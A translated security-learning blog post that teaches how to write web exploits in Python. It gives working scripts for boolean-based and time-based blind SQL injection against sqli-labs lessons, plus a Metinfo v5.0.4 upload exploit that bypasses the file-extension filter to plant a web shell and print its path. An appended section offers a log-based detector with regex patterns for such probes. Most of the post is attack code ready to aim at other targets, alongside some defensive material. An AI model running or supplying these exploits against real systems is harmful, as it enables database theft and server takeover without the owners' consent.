【CyberSecurityLearning 68】Writing exp in Python
Contents
Writing exp in Python
Boolean-based blind injection with a Python script
Time-based (delay) injection with a Python script
File upload
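Writing exp in Python
exp: an exploit, a tool for exploiting a vulnerability
The focus is mainly on web vulnerabilities
Requirements:
1. Be able to read an exp written by someone else, and modify it
2. Be able to write an exp yourself
Base environment: python3
Core module: requests
For a detailed introduction to the requests module, see: https://blog.csdn.net/Waffle666/article/details/115720052
Custom headers
Redefining the User-Agent
Timeouts
Passing parameters with GET
Passing parameters with POST
File upload
Cookies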
Boolean-based blind injection with a Python script
Using sqli-labs Less-8 as the example:
```python
import requests
import string

url = "http://192.168.3.102:82/Less-8/"

# Length of the page returned for a normal request; a "true" condition returns the same length
normalHtmlLen = len(requests.get(url=url+"?id=1").text)
print("The len of HTML: "+str(normalHtmlLen))

# Step 1: find the length of the database name
dbNameLen = 0
while True:
    dbNameLen_url = url+"?id=1'+and+length(database())="+str(dbNameLen)+"--+"
    #print(dbNameLen_url)
    if len(requests.get(dbNameLen_url).text) == normalHtmlLen:
        print("The len of dbNameLen: "+str(dbNameLen))
        break
    if dbNameLen == 30:
        print("ERROR!")
        break
    dbNameLen += 1

# Step 2: recover the database name one character at a time
dbName = ""
for i in range(1, dbNameLen+1):
    for a in string.ascii_lowercase:
        dbName_url = url+"?id=1'+and+substr(database(),"+str(i)+",1)='"+a+"'--+"
        #print(dbName_url)
        if len(requests.get(dbName_url).text) == normalHtmlLen:
            dbName += a
            print("The dbName :"+dbName)
            break
```

Time-based (delay) injection with a Python script
Using sqli-labs Less-9 as the example:
```python
import requests
import string

url = "http://192.168.3.102:82/Less-9/"

def timeOut(url):
    # A request that takes longer than 3 seconds means sleep(5) ran, i.e. the condition was true
    try:
        res = requests.get(url, timeout=3)
        return res.text
    except Exception as e:
        return "timeout"

# Step 1: find the length of the database name
dbNameLen = 0
while True:
    dbNameLen += 1
    dbNameLen_url = url+"?id=1'+and+if(length(database())="+str(dbNameLen)+",sleep(5),1) --+"
    #print(dbNameLen_url)
    if "timeout" in timeOut(dbNameLen_url):
        print("The Len of dbName: "+str(dbNameLen))
        break
    if dbNameLen == 30:
        print("ERROR!")
        break

# Step 2: recover the database name one character at a time
dbName = ""
for i in range(1, dbNameLen+1):
    for char in string.ascii_lowercase:
        dbName_url = url+"?id=1'+and+if(substr(database(),"+str(i)+",1)='"+char+"',sleep(5),1)--+"
        #print(dbName_url)
        if "timeout" in timeOut(dbName_url):
            dbName += char
            print("The dbName :"+dbName)
            break
```

File upload
Using Metinfo v5.0.4 as the example:
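```python
import requests
import sys

# Base URL of the lab install, e.g. http://192.168.1.200/metinfov504/metinfov504
url = sys.argv[1]
# Path of the local file to upload; read from the second argument here (assumption)
path = sys.argv[2]

postUrl = url+"/admin/include/uploadify.php?metinfo_admin_id=aaa&metinfo_admin_pass=123.com&met_admin_table=met_admin_table%23&type=upfile&met_file_format=jpg|pphphp"

with open(path, "rb") as f:
    upFile = {"FileData": f}
    res = requests.post(url=postUrl, files=upFile)

# The response body carries the stored path after a 4-character prefix
print("The Shell path:"+url+res.text[4:])
```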
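Seen from the server side, the boolean and time-based scripts earlier on this page produce a burst of near-identical requests from one client, each with an `id` value that breaks out of the quote and calls `length(`, `substr(` or `sleep(`. The following detection sketch is an added example, not code from the original post; the log lines, the threshold and the function names are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Client IP and request target from a combined-format access-log line
REQ = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST) (\S+) [^"]*" \d{3} ')
# Probe shape used by both scripts: a quote break-out followed by a SQL function call
PROBE = re.compile(r"'.*\b(length|substr|substring|mid|ascii|if|sleep|benchmark)\s*\(", re.I | re.S)
TIMING = re.compile(r"\b(sleep|benchmark)\s*\(", re.I)

def build_sample_log():
    """Constructed access-log lines: one normal client, two enumerating clients."""
    fmt = '{ip} - - [01/Jan/2024:10:00:00 +0000] "GET /Less-{n}/?id={q} HTTP/1.1" 200 700'
    lines = [fmt.format(ip="10.0.0.5", n=8, q="1"), fmt.format(ip="10.0.0.5", n=8, q="2")]
    for i in range(1, 9):   # boolean-style probes, one per candidate length
        lines.append(fmt.format(ip="10.0.0.7", n=8, q=f"1'+and+length(database())={i}--+"))
    for c in "abcdefgh":    # time-based probes, with the space URL-encoded as %20
        q = f"1'+and+if(substr(database(),1,1)='{c}',sleep(5),1)%20--+"
        lines.append(fmt.format(ip="10.0.0.9", n=9, q=q))
    return lines

def find_blind_sqli_clients(lines, threshold=5):
    """Return {client_ip: {"probes": n, "time_based": bool}} for clients that sent
    at least `threshold` requests whose query parameters contain a SQL probe."""
    probes, timed = Counter(), set()
    for line in lines:
        m = REQ.match(line)
        if not m:
            continue        # skip lines that are not in the expected format
        ip, target = m.group(1), m.group(2)
        # parse_qsl decodes %xx and turns '+' into a space, as the server would
        for _name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            if PROBE.search(value):
                probes[ip] += 1
                if TIMING.search(value):
                    timed.add(ip)
    return {ip: {"probes": n, "time_based": ip in timed}
            for ip, n in probes.items() if n >= threshold}

if __name__ == "__main__":
    for ip, info in find_blind_sqli_clients(build_sample_log()).items():
        print(ip, info)
```

The threshold keeps a single odd request from raising an alert; what gives the scripts away is the repetition of the same probe with only one value changing.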